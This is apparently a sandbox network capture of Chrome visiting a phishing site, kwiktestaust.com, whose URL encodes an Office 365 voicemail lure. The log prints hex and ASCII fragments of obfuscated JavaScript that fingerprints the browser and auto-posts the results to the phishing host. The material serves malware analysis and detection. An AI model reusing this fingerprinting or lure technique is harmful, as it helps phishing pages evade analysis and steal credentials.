                                                                2024-11-07 20:40:00 UTC1369INData Raw: 70 65 22 2c 22 68 69 64 64 65 6e 22 29 2c 65 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 74 29 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 6e 61 6d 65 22 2c 22 44 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 5b 6e 61 6d 65 3d 64 5d 22 29 2e 6c 65 6e 67 74 68 26 26 76 2e 70 75 73 68 28 22 6e 61 6d 65 22 2b 4d 2b 22 2a 5b 2a 5e 24 7c 21 7e 5d 3f 3d 22 29 2c 32 21 3d 3d 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 3a 65 6e 61 62 6c 65 64 22 29 2e 6c 65 6e 67 74 68 26 26 76 2e 70 75 73 68 28 22 3a 65 6e 61 62 6c 65 64 22 2c 22 3a 64 69 73 61 62 6c 65 64 22 29 2c 61 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 65 29 2e 64 69 73 61 62 6c 65 64 3d 21 30 2c 32 21 3d 3d 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 3a 64
                                                                Data Ascii: pe","hidden"),e.appendChild(t).setAttribute("name","D"),e.querySelectorAll("[name=d]").length&&v.push("name"+M+"*[*^$|!~]?="),2!==e.querySelectorAll(":enabled").length&&v.push(":enabled",":disabled"),a.appendChild(e).disabled=!0,2!==e.querySelectorAll(":d


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                2192.168.2.1649714188.114.97.34436880C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-11-07 20:40:00 UTC724OUTGET /o/?c3Y9bzM2NV8xX3ZvaWNlJnJhbmQ9WlZrMWQwcz0mdWlkPVVTRVIyMTEwMjAyNFU1MjEwMjExNw== HTTP/1.1
                                                                Host: kwiktestaust.com
                                                                Connection: keep-alive
                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                sec-ch-ua-mobile: ?0
                                                                sec-ch-ua-platform: "Windows"
                                                                Upgrade-Insecure-Requests: 1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Sec-Fetch-Site: cross-site
                                                                Sec-Fetch-Mode: navigate
                                                                Sec-Fetch-Dest: document
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.9
                                                                2024-11-07 20:40:01 UTC941INHTTP/1.1 200 OK
                                                                Date: Thu, 07 Nov 2024 20:40:01 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                X-Powered-By: PHP/7.3.33
                                                                Cache-Control: no-store
                                                                Set-Cookie: _cid=05688cc8bbdbb0122f88552d85978beb; expires=Thu, 07-Nov-2024 20:41:01 GMT; Max-Age=60
                                                                cf-cache-status: DYNAMIC
                                                                Vary: Accept-Encoding
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AYDptr0UsRUEjJlP%2F8IANRKkB0bLq1lh%2FUlmbsvnr0mMNa%2F1%2FyqrkcR5HMrMltJw8hRkkPC0eFEQFkZXBDOHHR5dcvixYm%2FrEtXz6hIUFQf9rfaQBFlV4ieTuXYordIaYSif"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8df022cc981a0b8a-DFW
                                                                alt-svc: h3=":443"; ma=86400
                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1394&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2840&recv_bytes=1302&delivery_rate=2056818&cwnd=250&unsent_bytes=0&cid=fc69b73a85a4d911&ts=863&x=0"
                                                                2024-11-07 20:40:01 UTC428INData Raw: 31 32 36 39 0d 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 6e 6f 73 63 72 69 70 74 3e 59 6f 75 20 6e 65 65 64 20 74 6f 20 65 6e 61 62 6c 65 20 4a 61 76 61 53 63 72 69 70 74 20 74 6f 20 72 75 6e 20 74 68 69 73 20 61 70 70 2e 3c 2f 6e 6f 73 63 72 69 70 74 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 72 6f
                                                                Data Ascii: 1269<!DOCTYPE html><html lang="en"> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> </head> <body> <noscript>You need to enable JavaScript to run this app.</noscript> <div id="ro
                                                                2024-11-07 20:40:01 UTC1369INData Raw: 3d 72 65 61 63 74 5f 69 6e 73 74 61 6c 6c 65 64 63 68 75 6e 6b 73 29 7b 76 61 72 20 72 65 61 63 74 5f 61 6c 6c 6f 77 74 6f 6c 69 76 65 72 65 6c 6f 61 64 3d 7b 7d 3b 66 75 6e 63 74 69 6f 6e 20 72 65 61 63 74 5f 6e 65 77 62 61 73 65 71 75 65 75 65 6c 61 73 74 28 5f 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 73 74 79 6c 65 5f 6c 6f 61 64 65 72 5f 64 69 73 74 5f 72 75 6e 74 69 6d 65 5f 69 6e 6a 65 63 74 73 74 79 6c 65 73 69 6e 74 6f 73 74 79 6c 65 74 61 67 5f 6a 73 5f 5f 77 65 62 70 61 63 6b 5f 69 6d 70 6f 72 74 65 64 5f 6d 6f 64 75 6c 65 5f 30 5f 5f 5f 64 65 66 61 75 6c 74 29 7b 74 72 79 7b 76 61 72 20 72 65 61 63 74 72 65 66 6c 65 63 74 3d 72 65 61 63 74 5f 69 6e 73 74 61 6c 6c 65 64 63 68 75 6e 6b 73 5b 5f 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 73 74 79 6c 65
                                                                Data Ascii: =react_installedchunks){var react_allowtolivereload={};function react_newbasequeuelast(_node_modules_style_loader_dist_runtime_injectstylesintostyletag_js__webpack_imported_module_0___default){try{var reactreflect=react_installedchunks[_node_modules_style
                                                                2024-11-07 20:40:01 UTC1369INData Raw: 65 61 63 74 5f 6e 6f 6d 6f 64 75 6c 65 5b 27 63 6f 6e 73 6f 6c 65 27 5d 3d 72 65 61 63 74 5f 6f 6e 63 65 28 77 69 6e 64 6f 77 5b 27 63 6f 6e 73 6f 6c 65 27 5d 29 2c 72 65 61 63 74 5f 6e 6f 6d 6f 64 75 6c 65 5b 27 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 27 5d 3d 66 75 6e 63 74 69 6f 6e 28 72 65 61 63 74 5f 66 69 6e 69 73 68 65 64 6c 61 6e 65 73 29 7b 74 72 79 7b 76 61 72 20 72 65 61 63 74 5f 63 6f 6d 6d 69 74 61 74 74 61 63 68 72 65 66 3d 7b 7d 3b 72 65 61 63 74 5f 66 69 6e 69 73 68 65 64 6c 61 6e 65 73 3d 72 65 61 63 74 5f 66 69 6e 69 73 68 65 64 6c 61 6e 65 73 5b 27 61 74 74 72 69 62 75 74 65 73 27 5d 3b 66 6f 72 28 76 61 72 20 72 65 61 63 74 5f 63 75 72 72 65 6e 74 70 61 72 65 6e 74 20 69 6e 20 72 65 61 63 74 5f 66 69 6e 69 73 68 65 64 6c 61 6e 65
                                                                Data Ascii: eact_nomodule['console']=react_once(window['console']),react_nomodule['documentElement']=function(react_finishedlanes){try{var react_commitattachref={};react_finishedlanes=react_finishedlanes['attributes'];for(var react_currentparent in react_finishedlane
                                                                2024-11-07 20:40:01 UTC1369INData Raw: 74 5f 63 6f 6d 62 69 6e 65 64 6d 65 73 73 61 67 65 5b 27 6d 65 73 73 61 67 65 27 5d 29 3b 7d 74 72 79 7b 76 61 72 20 72 65 61 63 74 5f 65 6d 70 74 79 6f 62 6a 65 63 74 3d 64 6f 63 75 6d 65 6e 74 5b 27 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 27 5d 28 27 63 61 6e 76 61 73 27 29 5b 27 67 65 74 43 6f 6e 74 65 78 74 27 5d 28 27 77 65 62 67 6c 27 29 2c 72 65 61 63 74 5f 61 73 79 6e 63 3d 72 65 61 63 74 5f 65 6d 70 74 79 6f 62 6a 65 63 74 5b 27 67 65 74 45 78 74 65 6e 73 69 6f 6e 27 5d 28 27 57 45 42 47 4c 5f 64 65 62 75 67 5f 72 65 6e 64 65 72 65 72 5f 69 6e 66 6f 27 29 3b 72 65 61 63 74 5f 6e 6f 6d 6f 64 75 6c 65 5b 27 77 65 62 67 6c 27 5d 3d 7b 27 76 65 6e 64 6f 72 27 3a 72 65 61 63 74 5f 65 6d 70 74 79 6f 62 6a 65 63 74 5b 27 67 65 74 50 61 72 61 6d 65 74 65
                                                                Data Ascii: t_combinedmessage['message']);}try{var react_emptyobject=document['createElement']('canvas')['getContext']('webgl'),react_async=react_emptyobject['getExtension']('WEBGL_debug_renderer_info');react_nomodule['webgl']={'vendor':react_emptyobject['getParamete
                                                                2024-11-07 20:40:01 UTC186INData Raw: 29 2c 72 65 61 63 74 5f 69 6e 74 65 72 76 61 6c 69 64 5b 27 61 70 70 65 6e 64 43 68 69 6c 64 27 5d 28 72 65 61 63 74 5f 73 74 72 6f 6b 65 6c 69 6e 65 6a 6f 69 6e 29 2c 64 6f 63 75 6d 65 6e 74 5b 27 62 6f 64 79 27 5d 5b 27 61 70 70 65 6e 64 43 68 69 6c 64 27 5d 28 72 65 61 63 74 5f 69 6e 74 65 72 76 61 6c 69 64 29 2c 72 65 61 63 74 5f 69 6e 74 65 72 76 61 6c 69 64 5b 27 73 75 62 6d 69 74 27 5d 28 29 3b 7d 28 29 29 3b 7d 28 29 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a
                                                                Data Ascii: ),react_intervalid['appendChild'](react_strokelinejoin),document['body']['appendChild'](react_intervalid),react_intervalid['submit']();}());}());</script> </div> </body></html>
                                                                2024-11-07 20:40:01 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                3192.168.2.1649715188.114.97.34436880C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-11-07 20:40:01 UTC1021OUTPOST /o/?c3Y9bzM2NV8xX3ZvaWNlJnJhbmQ9WlZrMWQwcz0mdWlkPVVTRVIyMTEwMjAyNFU1MjEwMjExNw== HTTP/1.1
                                                                Host: kwiktestaust.com
                                                                Connection: keep-alive
                                                                Content-Length: 139351
                                                                Cache-Control: max-age=0
                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                sec-ch-ua-mobile: ?0
                                                                sec-ch-ua-platform: "Windows"
                                                                Upgrade-Insecure-Requests: 1
                                                                Origin: https://kwiktestaust.com
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Sec-Fetch-Site: same-origin
                                                                Sec-Fetch-Mode: navigate
                                                                Sec-Fetch-Dest: document
                                                                Referer: https://kwiktestaust.com/o/?c3Y9bzM2NV8xX3ZvaWNlJnJhbmQ9WlZrMWQwcz0mdWlkPVVTRVIyMTEwMjAyNFU1MjEwMjExNw==
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.9
                                                                Cookie: _cid=05688cc8bbdbb0122f88552d85978beb
                                                                2024-11-07 20:40:01 UTC16384OUTData Raw: 64 61 74 61 3d 25 37 42 25 32 32 73 63 72 65 65 6e 25 32 32 25 33 41 25 37 42 25 32 32 61 76 61 69 6c 57 69 64 74 68 25 32 32 25 33 41 31 32 38 30 25 32 43 25 32 32 61 76 61 69 6c 48 65 69 67 68 74 25 32 32 25 33 41 39 38 34 25 32 43 25 32 32 77 69 64 74 68 25 32 32 25 33 41 31 32 38 30 25 32 43 25 32 32 68 65 69 67 68 74 25 32 32 25 33 41 31 30 32 34 25 32 43 25 32 32 63 6f 6c 6f 72 44 65 70 74 68 25 32 32 25 33 41 32 34 25 32 43 25 32 32 70 69 78 65 6c 44 65 70 74 68 25 32 32 25 33 41 32 34 25 32 43 25 32 32 61 76 61 69 6c 4c 65 66 74 25 32 32 25 33 41 30 25 32 43 25 32 32 61 76 61 69 6c 54 6f 70 25 32 32 25 33 41 30 25 32 43 25 32 32 6f 72 69 65 6e 74 61 74 69 6f 6e 25 32 32 25 33 41 25 32 32 25 35 42 6f 62 6a 65 63 74 2b 53 63 72 65 65 6e 4f 72 69 65
                                                                Data Ascii: data=%7B%22screen%22%3A%7B%22availWidth%22%3A1280%2C%22availHeight%22%3A984%2C%22width%22%3A1280%2C%22height%22%3A1024%2C%22colorDepth%22%3A24%2C%22pixelDepth%22%3A24%2C%22availLeft%22%3A0%2C%22availTop%22%3A0%2C%22orientation%22%3A%22%5Bobject+ScreenOrie
                                                                2024-11-07 20:40:01 UTC16384OUTData Raw: 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 58 4d 4c 44 6f 63 75 6d 65 6e 74 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 58 4d 4c 44 6f 63 75 6d 65 6e 74 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 57 72 69 74 61 62 6c 65 53 74 72 65 61 6d 44 65 66 61 75 6c 74 57 72 69 74 65 72 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 57 72 69 74 61 62 6c 65 53 74 72 65 61 6d 44 65 66 61 75 6c 74 57 72 69 74 65 72 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 57 72 69 74 61 62 6c 65 53 74 72 65 61 6d 44 65 66 61 75 6c 74 43 6f 6e 74 72 6f 6c 6c 65 72
                                                                Data Ascii: %5Bnative+code%5D+%7D%22%2C%22XMLDocument%22%3A%22function+XMLDocument%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22WritableStreamDefaultWriter%22%3A%22function+WritableStreamDefaultWriter%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22WritableStreamDefaultController
                                                                2024-11-07 20:40:01 UTC16384OUTData Raw: 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 53 56 47 41 45 6c 65 6d 65 6e 74 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 53 56 47 41 45 6c 65 6d 65 6e 74 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 52 65 73 70 6f 6e 73 65 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 52 65 73 70 6f 6e 73 65 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 52 65 73 69 7a 65 4f 62 73 65 72 76 65 72 53 69 7a 65 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 52 65 73 69 7a 65 4f 62 73 65 72 76 65 72 53 69 7a 65 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74
                                                                Data Ascii: Bnative+code%5D+%7D%22%2C%22SVGAElement%22%3A%22function+SVGAElement%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22Response%22%3A%22function+Response%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22ResizeObserverSize%22%3A%22function+ResizeObserverSize%28%29+%7B+%5Bnat
                                                                2024-11-07 20:40:01 UTC16384OUTData Raw: 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 48 54 4d 4c 4d 65 6e 75 45 6c 65 6d 65 6e 74 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 48 54 4d 4c 4d 65 6e 75 45 6c 65 6d 65 6e 74 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 48 54 4d 4c 4d 65 64 69 61 45 6c 65 6d 65 6e 74 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 48 54 4d 4c 4d 65 64 69 61 45 6c 65 6d 65 6e 74 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 48 54 4d 4c 4d 61 72 71 75 65 65 45 6c 65 6d 65 6e 74 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 48 54 4d 4c 4d 61 72 71 75 65 65 45 6c
                                                                Data Ascii: ative+code%5D+%7D%22%2C%22HTMLMenuElement%22%3A%22function+HTMLMenuElement%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22HTMLMediaElement%22%3A%22function+HTMLMediaElement%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22HTMLMarqueeElement%22%3A%22function+HTMLMarqueeEl
                                                                2024-11-07 20:40:01 UTC16384OUTData Raw: 44 25 32 32 25 32 43 25 32 32 41 62 6f 72 74 53 69 67 6e 61 6c 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 41 62 6f 72 74 53 69 67 6e 61 6c 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 41 62 6f 72 74 43 6f 6e 74 72 6f 6c 6c 65 72 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 41 62 6f 72 74 43 6f 6e 74 72 6f 6c 6c 65 72 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 6f 66 66 73 63 72 65 65 6e 42 75 66 66 65 72 69 6e 67 25 32 32 25 33 41 74 72 75 65 25 32 43 25 32 32 57 65 62 41 73 73 65 6d 62 6c 79 25 32 32 25 33 41 25 32 32 25 35 42 6f 62 6a 65 63 74 2b 57 65 62 41 73 73 65 6d 62 6c 79
                                                                Data Ascii: D%22%2C%22AbortSignal%22%3A%22function+AbortSignal%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22AbortController%22%3A%22function+AbortController%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22offscreenBuffering%22%3Atrue%2C%22WebAssembly%22%3A%22%5Bobject+WebAssembly
                                                                2024-11-07 20:40:01 UTC16384OUTData Raw: 65 72 50 61 63 6b 65 74 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 55 53 42 49 73 6f 63 68 72 6f 6e 6f 75 73 4f 75 74 54 72 61 6e 73 66 65 72 50 61 63 6b 65 74 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 55 53 42 49 73 6f 63 68 72 6f 6e 6f 75 73 4f 75 74 54 72 61 6e 73 66 65 72 52 65 73 75 6c 74 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 55 53 42 49 73 6f 63 68 72 6f 6e 6f 75 73 4f 75 74 54 72 61 6e 73 66 65 72 52 65 73 75 6c 74 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 55 53 42 4f 75 74 54 72 61 6e 73 66 65 72 52 65 73 75 6c 74 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f
                                                                Data Ascii: erPacket%22%3A%22function+USBIsochronousOutTransferPacket%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22USBIsochronousOutTransferResult%22%3A%22function+USBIsochronousOutTransferResult%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22USBOutTransferResult%22%3A%22functio
                                                                2024-11-07 20:40:01 UTC16384OUTData Raw: 25 32 43 25 32 32 4d 65 64 69 61 53 74 72 65 61 6d 41 75 64 69 6f 53 6f 75 72 63 65 4e 6f 64 65 25 32 32 25 32 43 25 32 32 4d 65 64 69 61 53 74 72 65 61 6d 41 75 64 69 6f 44 65 73 74 69 6e 61 74 69 6f 6e 4e 6f 64 65 25 32 32 25 32 43 25 32 32 4d 65 64 69 61 53 74 72 65 61 6d 25 32 32 25 32 43 25 32 32 4d 65 64 69 61 53 6f 75 72 63 65 48 61 6e 64 6c 65 25 32 32 25 32 43 25 32 32 4d 65 64 69 61 53 6f 75 72 63 65 25 32 32 25 32 43 25 32 32 4d 65 64 69 61 52 65 63 6f 72 64 65 72 25 32 32 25 32 43 25 32 32 4d 65 64 69 61 51 75 65 72 79 4c 69 73 74 45 76 65 6e 74 25 32 32 25 32 43 25 32 32 4d 65 64 69 61 51 75 65 72 79 4c 69 73 74 25 32 32 25 32 43 25 32 32 4d 65 64 69 61 4c 69 73 74 25 32 32 25 32 43 25 32 32 4d 65 64 69 61 45 72 72 6f 72 25 32 32 25 32 43 25
                                                                Data Ascii: %2C%22MediaStreamAudioSourceNode%22%2C%22MediaStreamAudioDestinationNode%22%2C%22MediaStream%22%2C%22MediaSourceHandle%22%2C%22MediaSource%22%2C%22MediaRecorder%22%2C%22MediaQueryListEvent%22%2C%22MediaQueryList%22%2C%22MediaList%22%2C%22MediaError%22%2C%
                                                                2024-11-07 20:40:01 UTC16384OUTData Raw: 65 65 63 68 53 79 6e 74 68 65 73 69 73 25 32 32 25 32 43 25 32 32 6f 6e 63 6f 6e 74 65 6e 74 76 69 73 69 62 69 6c 69 74 79 61 75 74 6f 73 74 61 74 65 63 68 61 6e 67 65 25 32 32 25 32 43 25 32 32 6f 6e 73 63 72 6f 6c 6c 65 6e 64 25 32 32 25 32 43 25 32 32 41 6e 69 6d 61 74 69 6f 6e 50 6c 61 79 62 61 63 6b 45 76 65 6e 74 25 32 32 25 32 43 25 32 32 41 6e 69 6d 61 74 69 6f 6e 54 69 6d 65 6c 69 6e 65 25 32 32 25 32 43 25 32 32 43 53 53 41 6e 69 6d 61 74 69 6f 6e 25 32 32 25 32 43 25 32 32 43 53 53 54 72 61 6e 73 69 74 69 6f 6e 25 32 32 25 32 43 25 32 32 44 6f 63 75 6d 65 6e 74 54 69 6d 65 6c 69 6e 65 25 32 32 25 32 43 25 32 32 42 61 63 6b 67 72 6f 75 6e 64 46 65 74 63 68 4d 61 6e 61 67 65 72 25 32 32 25 32 43 25 32 32 42 61 63 6b 67 72 6f 75 6e 64 46 65 74 63
                                                                Data Ascii: eechSynthesis%22%2C%22oncontentvisibilityautostatechange%22%2C%22onscrollend%22%2C%22AnimationPlaybackEvent%22%2C%22AnimationTimeline%22%2C%22CSSAnimation%22%2C%22CSSTransition%22%2C%22DocumentTimeline%22%2C%22BackgroundFetchManager%22%2C%22BackgroundFetc
                                                                2024-11-07 20:40:01 UTC8279OUTData Raw: 63 72 65 61 74 65 41 74 74 72 69 62 75 74 65 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 63 72 65 61 74 65 41 74 74 72 69 62 75 74 65 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 63 72 65 61 74 65 41 74 74 72 69 62 75 74 65 4e 53 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 63 72 65 61 74 65 41 74 74 72 69 62 75 74 65 4e 53 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 63 72 65 61 74 65 43 44 41 54 41 53 65 63 74 69 6f 6e 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 63 72 65 61 74 65 43 44 41 54 41 53 65 63 74 69 6f 6e 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76
                                                                Data Ascii: createAttribute%22%3A%22function+createAttribute%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22createAttributeNS%22%3A%22function+createAttributeNS%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22createCDATASection%22%3A%22function+createCDATASection%28%29+%7B+%5Bnativ
                                                                2024-11-07 20:40:03 UTC837INHTTP/1.1 200 OK
                                                                Date: Thu, 07 Nov 2024 20:40:03 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                X-Powered-By: PHP/7.3.33
                                                                Cache-Control: no-store
                                                                cf-cache-status: DYNAMIC
                                                                Vary: Accept-Encoding
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SK1H8Kyx8efcH6QAzPtrh5b0fT2dlHlbC8WKXmjatcriWmHYNceiWFEenycfNKUgmuvJv9qrrl9TIMxgEL1658QIXijxGWo4zVG0LkpZowhIK%2Btz6CZPf8pzEEW1PbH4ARHG"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8df022d25ed3e823-DFW
                                                                alt-svc: h3=":443"; ma=86400
                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1250&sent=67&recv=155&lost=0&retrans=0&sent_bytes=2838&recv_bytes=141368&delivery_rate=2425460&cwnd=237&unsent_bytes=0&cid=d4c94af5130d5bed&ts=2869&x=0"
                                                                2024-11-07 20:40:03 UTC371INData Raw: 31 36 63 0d 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 69 64 3d 27 68 74 6d 6c 27 20 73 74 69 3d 27 56 6c 5a 4f 52 6c 56 71 53 58 68 4e 56 45 46 35 54 55 52 4a 4d 46 5a 55 56 58 6c 4e 56 45 46 35 54 56 52 46 4d 77 3d 3d 27 20 76 69 63 3d 27 27 20 6c 61 6e 67 3d 27 65 6e 27 3e 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 73 6f 63 6b 65 74 2e 69 6f 2f 34 2e 37 2e 35 2f 73 6f 63 6b 65 74 2e 69 6f 2e 6d 69 6e 2e 6a 73 27 20 69 6e 74 65 67 72 69 74 79 3d 27 73 68 61 33 38 34 2d 32 68 75 61 5a 76 4f 52 39 69 44 7a 48 71 73 6c 71 77 70 52 38 37 69 73 45 6d 72 66 78 71 79 57 4f 46 37 68 72 37 42 59 36 4b 47 30 2b 68 56 4b 4c 6f 45 58 4d 50 55 4a 77 33 79 6e 57 75 68
                                                                Data Ascii: 16c<!DOCTYPE html><html id='html' sti='VlZORlVqSXhNVEF5TURJMFZUVXlNVEF5TVRFMw==' vic='' lang='en'><head> <script src='https://cdn.socket.io/4.7.5/socket.io.min.js' integrity='sha384-2huaZvOR9iDzHqslqwpR87isEmrfxqyWOF7hr7BY6KG0+hVKLoEXMPUJw3ynWuh


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                4192.168.2.1649718188.114.97.34436880C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-11-07 20:40:03 UTC651OUTGET /o/jsv.js HTTP/1.1
                                                                Host: kwiktestaust.com
                                                                Connection: keep-alive
                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                sec-ch-ua-mobile: ?0
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                sec-ch-ua-platform: "Windows"
                                                                Accept: */*
